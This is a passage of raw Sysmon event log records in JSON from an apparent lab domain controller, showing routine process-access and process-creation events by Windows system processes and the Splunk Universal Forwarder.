{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-0010B22E0A00}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-0010B22E0A00}","TargetProcessId":"5048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.211\r\nSourceProcessGUID: {41C8662E-21E0-5F25-0000-0010B22E0A00}\r\nSourceProcessId: 5048\r\nSourceThreadId: 3672\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.211","SourceProcessGUID":"{41C8662E-21E0-5F25-0000-0010B22E0A00}","SourceProcessId":"5048","SourceThreadId":"3672","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nProcessGuid: {41C8662E-21E0-5F25-0000-00107B300A00}\r\nProcessId: 4416\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","ProcessGuid":"{41C8662E-21E0-5F25-0000-00107B300A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6587,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-00107B300A00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-00107B300A00}","TargetProcessId":"4416","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6588,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-00107B300A00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-00107B300A00}","TargetProcessId":"4416","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 